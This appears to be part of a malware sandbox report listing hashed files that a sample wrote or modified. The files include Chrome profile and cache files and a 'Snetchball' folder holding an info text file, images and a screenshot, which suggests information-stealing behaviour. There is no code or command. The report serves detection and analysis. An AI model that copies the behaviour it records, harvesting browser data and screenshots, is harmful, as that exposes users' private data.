| SHA256 | 2395b37f883ad8f41f6261f04c9ee617cdd19974606620f7b7260824974547a9 |
| SHA512 | 35e40bca4449396d6cc501701a87ef48e4aa8f020938d94f8653301ab4de73dfc39b3a2d6664f5f74b7e39cc98185fc03b5a89546e375f6f75f51035a2184ad7 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 4ff8ba704457cf3affe1ae6a0d33b910 |
| SHA1 | b981358edb43fd8e7506612689026dbf924f41e6 |
| SHA256 | 08bc9387c34fedb74838cabba6ba0c50a5081c1f62ece1fa2185f9957b30ccfb |
| SHA512 | a324602a243005cc67a05df0af3b9348f5ce04852010b2a46bf3d940ce4e797b980e793e84deeb5401a1827d1abd63751ea19722fd7784bba37c5ec114c830cf |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 668368d548829d7b66aa4cce071567a1 |
| SHA1 | 04b8746a0aa8951785531e711e797eaa8697615b |
| SHA256 | 7c349136f3dd13c777093818156fa047bcf67c9c9c3ec11998ba43274a095fab |
| SHA512 | 5f17ce84b403be6fc33149da0d3c4a458742cf6e5597c0bd9e9910e752ed1be4b79ff086fd68269ba9b2e52a6a91b6ca1903af04fc8e8545881e6425efebd56e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 0cd2b9533f6c919f6f83b771391db204 |
| SHA1 | 91478e08a96967eddacf896169b029560c5a7984 |
| SHA256 | cd907493726244c256cf76150f38904981a155bb0c46df89e4fa7e9955487d9d |
| SHA512 | 741d005d5cd4d5d5298108a3d3dcf34557a674515892697172e0dfefb897b37ee36530e7fd8e45ca349cd2ec660663ea54fccf524225e127394ad1e5b9fdacf9 |
C:\Users\Admin\AppData\Roaming\Snetchball\info_0.txt
| MD5 | 991a68a7cdf96327e78c211bd95a83f2 |
| SHA1 | 254923aca008ac4609c4a02da41d1a068a91123d |
| SHA256 | 34234f28bc6ac2b11e571ea3421a09131bfcd12c0d7c1bf98f08a10f5afd5c5b |
| SHA512 | 938e2f533d162751f2425140f734bdd6ea663b0e3c07d686f3db8d7cd0afa07600d8daf68d6c4576a77bf957218e8fc071d2ecaa3fad9d857635c8d7a046751c |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms
| MD5 | a3775e8b2e482dbe27c81b8d66b9f136 |
| SHA1 | edfc6474c55bf03895100d45cb00a5f8c0bd36fb |
| SHA256 | 26d233f0b2a079bcf70389f0c31f42dfd9230d6642e779b9bc3d7769e95d71ba |
| SHA512 | fd8fdb26145a811dd646ce7f12865690057cd173defb7df12a58780add6f5336dd232456db46b00b50589ca9bda4f8acb32212282cd1fe42fd5c4642761a9f14 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00019c
| MD5 | 87e8230a9ca3f0c5ccfa56f70276e2f2 |
| SHA1 | eb116c8fd20cb2f85b7a942c7dae3b0ed6d27fe7 |
| SHA256 | e18d7214e7d3d47d913c0436f5308b9296ca3c6cd34059bf9cbf03126bafafe9 |
| SHA512 | 37690a81a9e48b157298080746aa94289a4c721c762b826329e70b41ba475bb0261d048f9ab8e7301e43305c5ebf53246c20da8cd001130bf156e8b3bd38b9b8 |
C:\Users\Admin\AppData\Roaming\Snetchball\images\0.jpg
| MD5 | 035709e7eaa0f844a5b696c88306f9cf |
| SHA1 | ee068313c22c79a223bd53b78d38d0fff96b0dac |
| SHA256 | c88dd053aa82dcbfe537dc11e1c31e9242354c8fccb0c1a1c41ec33ef4e356d8 |
| SHA512 | eae144155b494f306bb5ed65961b1a57d553918a1fb62ea741de09faf981b36229d5b2a12c562551a17d0dc9aa599962ca5d701e0b600d2ca4ecc8532197e832 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 856df8b1f36c8d40032a340004e1c0b0 |
| SHA1 | 8004b90f97486057148ef07c4c402f28c6532a2a |
| SHA256 | 56dbe07280b0c57f5124193f76e5459667edc06dfa1943b62da2c954399c0ef4 |
| SHA512 | b67790ad170fbb439ad58c61a991e8d4f86e43223b3a52ed7a0817c0ce39cf6543bf9e441dcfbe38441639c015e2205cb225afdaf6416ff895f146d9b886ccb0 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms
| MD5 | bf1bac3434c67f5e718bbc1744d7682a |
| SHA1 | 63eb487556440ef51874e1bfdd93a4a0326f6c96 |
| SHA256 | 3dac9145724a2b8656a504c60973d6cb0dba467665d541f903ecf1d86fae1e47 |
| SHA512 | 5efeb5f2cc78ffc9ac1d9318798be9cb02560115a7cbcece5bb968c3f067fd74b5f1a2cd06584fc81abfefe7cebcbc7cc368469aab18678e8476d384766e9928 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 42da102aa0042fe9095db7d8e6c53db1 |
| SHA1 | 8c72924be6dd9365057ff9e0e362ff0b3d3d92bc |
| SHA256 | 99d056549595327e3e5f024080c63152cad1b1d7c536ce68a79f64b305367156 |
| SHA512 | 368a0b8a9527c1ffaed79eae4df08a2dcb9c9340345d5a3c5f855f5c3fb8270603bbc74831c8ae2ff81f7b8ca2fdc1af34400a5f91bfd6dd0c5244eb091d7cb6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | a693b76b1a8902c2d49c4fbd9662098e |
| SHA1 | c82445b4445bfcc4552c447271ecc18c87f7a3c9 |
| SHA256 | e91c0c98603e0aae45e3b34ba9dbc74b86a8c3017b35c53dd8ab2a5f4f3946be |
| SHA512 | ba2380b8033de56d10c1b41f950e8218fffa68e0c01e11c800d5c0a9698b71f24a939a6d19cba1ecc24b49b6f7e2dd7525169b9663c84e6a1b08aec7beae1272 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\ce276d6295816fa14d8d3ff4ce2fd5a2aee64026\dfd4109f-5797-4f15-a8d0-e0d3f29ee973\index-dir\the-real-index~RFe6fa275.TMP
| MD5 | 0512019ddc33511bd8ed430ae6c84bf4 |
| SHA1 | 2d142e41b7531b6971d02e2fb7c81f048b63c316 |
| SHA256 | d38092082baa08ec1d82d008625ec08c3ec67c89c525d1570bd53b2f9a62528c |
| SHA512 | 48cd5ada81478cbb6e5c87f4717d54567705ff2110f86be307a2c7f1c7d171c454e6855073d781b87cd7ba375934422a8c168c00063bf6e45309e9c6e1467a91 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\ce276d6295816fa14d8d3ff4ce2fd5a2aee64026\dfd4109f-5797-4f15-a8d0-e0d3f29ee973\index-dir\the-real-index
| MD5 | 119a80c6ff337f9d23616103da76f596 |
| SHA1 | b3cd6b716ea18bbde25f0ad03c6d56c45139dd4b |
| SHA256 | 7cf6327dd5c85d157db914d0ccfff527f282da0494b86d079c466c71a93bc183 |
| SHA512 | 25e7f4b681a6fc5ef2dc4ce5aadc10f25bea309190cb4fd4de926398e0a224bec91afbaa02a7a77d18690439b8e7131221eb5e9e287b5261ff265dc7206b9473 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\ce276d6295816fa14d8d3ff4ce2fd5a2aee64026\index.txt
| MD5 | 27bc7cbc27824aaabc21a8fc05b880cb |
| SHA1 | 0631b709aad95c5400755f200bc63ebc4527adaa |
| SHA256 | 44f355418c44badbbb596ed20a637106d4f2bf49b4f5ffcbbbef4889b32cccd8 |
| SHA512 | 5bbab589b7194d03b93213b0628e85c74133e388200d35c4b8eec9498088d89b40cdf84a4b70d94a3fa551f8a4a6d8ce4bea9d58bab988887ad2e9a6724e4325 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\ce276d6295816fa14d8d3ff4ce2fd5a2aee64026\index.txt~RFe6fa2b3.TMP
| MD5 | fe2b2f8ae588b94eebc3960fcf129b6c |
| SHA1 | 2ba5ec16b0fbd11c1eee5537229a8eede4bb74ef |
| SHA256 | 9c3b3f5a0c06b52b1c53375160aafe79278d7831942196cd7a017f12840c0e21 |
| SHA512 | 6ca7f25539925c422b99185e8427477583799f7741eda406f4c6386d1c050e515d07676aed2a6cc7e239b9e1a203093a98dfb18e4c33d0fe3df838ae21a9d3b1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | d83ebb40a269f7016f91b8152dffd6b7 |
| SHA1 | 91b9a09f9e9c3df9bfbca2b27c0fc59a79e795c1 |
| SHA256 | b680b5b2227e7eee3c56771d0746a11c46e5e3deb844705a7156ff5bb529b197 |
| SHA512 | 109bf4c4c33c179d0fcddf202960ce14292a01a330faa1d05d3bbddc1136642fa16017092d53ca9736d6ad92e971ef5e6347d6fb7d8c74072990a9dff219cd1c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_0001a6
| MD5 | 6e64a529396354c4c7315eaf773f3ee7 |
| SHA1 | 4a6f76f684428b2c65a170518607b46dd479d148 |
| SHA256 | d681d16e0e71325ddfd93ad12025b3ea4d5d2a5e7b8c4bc0ba8dae7b95aca6b3 |
| SHA512 | 4b1abc4bcfdafc70541e2fea60df08b13045a6270f4440979b3bee3706638a93829e49c3d5e7eb098429a0f7af6c31ca3890a71d776674a18fb4d7ada94a854e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_0001ac
| MD5 | f998b8f6765b4c57936ada0bb2eb4a5a |
| SHA1 | 13fb29dc0968838653b8414a125c124023c001df |
| SHA256 | 374db366966d7b48782f352c78a0b3670ffec33ed046d931415034d6f93dcfef |
| SHA512 | d340ae61467332f99e4606ef022ff71c9495b9d138a40cc7c58b3206be0d080b25f4e877a811a55f4320db9a7f52e39f88f1aa426ba79fc5e78fc73dacf8c716 |
C:\Users\Admin\AppData\Local\CEF\User Data\LocalPrefs.json
| MD5 | 461b51b40f9760bef3e0e24d6ef56171 |
| SHA1 | abfa34b85d98851493420f54d5c00fe5151f6726 |
| SHA256 | de0382cb21b08adce99811d1fc794eb0c79a282525a368cb3cb4cf27d53992d5 |
| SHA512 | 645441d2646d4adc347414a220d6b76e18223f2ef3b210e232c8b4f8b7195db4364c73c03ea7b0f5b2f48896afb3a828364d860c18ab05c8a12ec874c46ef5d9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 42335dbc79d72e2f174ad50b6360a455 |
| SHA1 | 4cc5c4d9cc65fb757aac3cb5619c26f96e0bd926 |
| SHA256 | cc96d68e62170cb8f09c0f0914fa36fca5c6613c328645801de63e2d6940bd1c |
| SHA512 | f18a8d213e0125938e813a55243377c909b0cdc42a4eb2400955537e341cc7e888511f75a6b315537c08112f4163b60760997cc69214d0215adfcb438e1ee202 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 7ce62394342f5f05bfa1363025d0d161 |
| SHA1 | 5a732a6fdb3d0d63c21bc0828656197fb8a896c9 |
| SHA256 | 56d7874a9be59a62b6f7866fd27fddb3f58b904fe33ce89601fde082f8327527 |
| SHA512 | 28fd32e2734f095778cd688c292568de27df9701102f027f264a61a8b6bb9bbc18854228402cc3627f250c303fa798fa7ed673f05a8a5dca4401a9577289b8d0 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | 9b9d9437cc2f5b1cc9619d0aa0d5d79d |
| SHA1 | acfe965a319e20d47546f4e54edcc6c5eb31de6b |
| SHA256 | fd2f215f77d4f4ffab13d551a6a0ba4fa21fbed8ddfa902065e33ad2688be56e |
| SHA512 | c81bbef5e79e28095372e6fdd5e2200c4079261a45e5ca6f7786d260fe1a128caa763d675ce9ba36e5cebb9ab233c4e1e90b91a0c368faf503b6f6c862764784 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | dff40aecca22b8e0a07c94aeef759e32 |
| SHA1 | f4a6cc29aa304ce1a7544be1ef8a8bf7481173e0 |
| SHA256 | 6cda87ac9555c5fc1439dc0a74d26055362b3a86a35fecc9bd5f5e47f8011797 |
| SHA512 | 8f53743ed456c100e0d9452f0255c90218ce80d3c135897ccda5349211b4520a034e8df928a6e4259ccb24b78d2e0b8a632238677a823b020737db980769262d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 858e8349e2d41bdb0f15c5355b1d995c |
| SHA1 | 5176afd52272dd3f175c5f576004193fe469e96a |
| SHA256 | 6d8b87599250713b30a38f2515389a4e1e10382bc21a38f28af4656fee319078 |
| SHA512 | ee9f7ad2d67ae7eb855bd19bfda0d796b37baa9adf1b26a59c92b721d2974a8e05beeb15a5731159955a5ad231f5a3b31b6f70de7424c4c21a53907d71edf491 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_0001bd
| MD5 | d84862513956cbe61aeb4ebbfdd3355a |
| SHA1 | 14ab269df17cb0333b1556ce120d587324479f6b |
| SHA256 | a18b26912ab9e034923cc64fbfdb59d682500f2c556456930e480b6bd69e33b5 |
| SHA512 | d04ca96d72595f1e291a6ce96f092c1707064800103cde733512a186c1b22e089b63690a0c53965c97248dd782731b22fa2d27b8ee3ae112647382f1c06d1a9d |
C:\Users\Admin\AppData\Roaming\Snetchball\screen\screenshot.png
| MD5 | be620c37f17f2bf12eae08d934ba0b2b |
| SHA1 | 59b83e8956c25a96c6f5c3805a7c45dfa1921471 |
| SHA256 | a6a2a27423f0ee113b94e47b31b2c05c25f29e8d7b32562992df8e04f2846cff |
| SHA512 | 66c63af9c0d6afa6525c513d948db5cbfd0b86c65143cac7b8e97b9bc1d8ba4b46b677f11d8ac24edd98de838a7fe94e3635a0d25dd3ce52339ef92cd0875b44 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 0f0da68b81f3e1b86d1a42383508af3b |
| SHA1 | ee9458958934c63a881e690fe6d1968da9374a53 |
| SHA256 | 796945656c6f1928f764e3e11bfd59fef64c4ea1ea23f6f28e8c1047e2b24abd |
| SHA512 | 86281ad7c3b559f6a9d5bf81d518a8c5e52194e49c2e4c26170f76d7dfa2645d14892b72a401d3955885c44fbf0b07f990c1bff9a87cf24901986c728a16f5ad |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | b6e98b3e08b1deda4736040855c99ceb |
| SHA1 | 56f43f6c62da863065d248469d1978f275e752e5 |
| SHA256 | ae9544b134ab43c5ad58e7f90a221337407a10d7bb6d2f81408f143441e20690 |
| SHA512 | 610d8c4be58da92a117770d2c8d753d0df8f44b58659b1d1ca85dbdbcf51c04fc472a3fd948c0145333ccce8f54692686f023d3ca18f85e0ef2e746b983d19fe |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | e493cb934dca4327de8d9a651508e625 |
| SHA1 | 84047ce102633463246b9f66c3007b0273ed4c40 |
| SHA256 | 53c221453194347327a95f1f93001812da65551c459047218119d56982b6ed44 |
| SHA512 | 07c8d62b342087031490ac69b7af6a1903aa2227c7cfaa4475a1bd4fd3e005736ef975b1b52ae20456664eec436cbf9900fc2bf5815058c592525d588de7c8af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 86040c1b4783b400936170f70a4bccd4 |
| SHA1 | c2697c02c0c70bc467811c90ef9036c2be0622e9 |
| SHA256 | d42d842c12ebba7dbdf347043641dcf0877241276f1a56efb93fd06f8112292b |
| SHA512 | 3af88f421c27f6cb60bf069aca00771dadb33e22e5698cc62a869c4dafae517d0931b1b86a67af1e7a6db60b921d79f8d9c3165d39bd87076f2bfcd2c454b13e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | 3ba17673f398e0f7129b2bb37020212a |
| SHA1 | 92f24a4900da2d0dfcb043a7f2b8db0b82bd7810 |
| SHA256 | 74fcecef17f567058f3a43ea75ebec1c14effed7735f3f35bea09ecfee527401 |
| SHA512 | 3fa518f195c238868f70b2c199b269bf23eea45b6a594233b5f1431a471f939fbce7a049934df22173492dde7ac7370038101d79cac69f3f0fb2fe80fe208b68 |